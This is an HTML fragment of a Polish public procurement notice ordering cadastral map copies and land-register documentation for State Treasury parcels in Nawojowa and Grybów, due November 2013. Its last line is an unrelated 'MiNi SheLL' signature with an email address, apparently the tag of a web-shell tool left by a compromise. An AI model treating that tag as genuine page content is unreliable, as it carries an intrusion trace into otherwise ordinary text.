<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> CZĘŚĆ 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działki ewidencyjnej Skarbu Państwa nr 373/13 o pow. 5,20 ha położonej w obrębie ewidencyjnym Popardowa gm. Nawojowa - w części oznaczonej na załączniku graficznym obejmującej teren położony poza korytem cieku wodnego -  wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości - dla potrzeb regulacji stanu prawnego nieruchomości
Opracowanie należy sporządzić  w 3 egzemplarzach .
Termin wykonania:15 listopad 2013 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> CZĘŚĆ 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uzupełnienie wykazu nieruchomości Skarbu Państwa dla celów realizacji ustawy z dnia 07 września 2007 r. o ujawnieniu w księgach wieczystych prawa własności nieruchomości Skarbu Państwa oraz jednostek samorządu terytorialnego dla 42 działek ewidencyjnych położonych  w obrębie Biała Niżna gmina Grybów o dane wieczysto - księgowe dla w/w działek zgodnie z tabelą prowadzoną przez Wydział Geodezji i Budownictwa. W przypadku rozbieżności w oznaczeniu działek pomiędzy stanem w ewidencji gruntów  w Lwh/KW należy wykonać  kopię mapy ewidencyjnej z wykazem zmian gruntowych.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz w wersji cyfrowej.
Termin wykonania: 15 listopad 2013 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com